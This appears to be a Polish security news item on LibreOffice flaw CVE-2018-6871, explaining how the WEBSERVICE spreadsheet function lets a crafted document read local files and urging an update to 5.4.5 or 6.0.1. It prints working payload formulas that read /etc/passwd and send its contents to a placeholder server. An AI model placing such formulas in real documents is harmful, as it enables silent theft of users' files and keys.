Luka w LibreOffice CVE-2018-6871 dla wersji przed 5.4.5 i przed 6.0.1 dotyczy funkcji WEBSERVICE, z której korzystają MS Excel 2013 i MS Excel 2016, a także dokumenty LibreOffice Calc. Metoda ta ze 100% skutecznością pozwala w sposób niewidoczny dla użytkownika wstrzyknąć lokalne pliki do dokumentu lub wysłać napastnikowi np. zawartość plików z systemu Linux „/etc/passwd” czy chociażby „/.ssh/*”. Użycie tego samego triku oraz protokołów w adresie URL "ftp[:]//" lub „file[:]//” jest tak samo skuteczne w systemach Windows i macOS z zainstalowanym oprogramowaniem LibreOffice w podatnych wersjach.
Do odczytania zawartości dowolnego pliku na dysku można posłużyć się złośliwym dokumentem z zaszytym poleceniem:
=WEBSERVICE("/etc/passwd")
W podobny sposób można wysłać ten plik na zdalny serwer:
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
Poważna luka w LibreOffice
Podatne są nie tylko dokumenty XLS generowane przez Libre Office Calc. Dal innych formatów np. DOC lub ODT wystarczy osadzić obiekt z LibreOffice Calc w innym dokumencie. Metoda została przetestowana i dołączona do pobrania w postaci exploita, który publicznie dostępny jest gotowy do zaimportowania do Metasploita.
Użytkownicy pakietu biurowego LibreOffice powinni jak najprędzej zaktualizować oprogramowanie do wersji stabilnych: 5.4.5 lub 6.0.1.
Pozostałe wszystkie warianty LibreOffice niezależnie od systemu operacyjnego mogą poważnie wpłynąć na bezpieczeństwo organizacji i użytkowników indywidualnych. Osoba atakująca, która wyśle ofierze spreparowany dokument, może pozyskać niemal dowolny plik z systemu operacyjnego. Warunek jest tylko jeden — do kradzieży pliku potrzebna jest wiedza o jego lokalizacji oraz uruchomienie złośliwego dokumentu. Dla plików systemowych lub konfiguracyjnych jest to bardzo łatwe do wykonania.
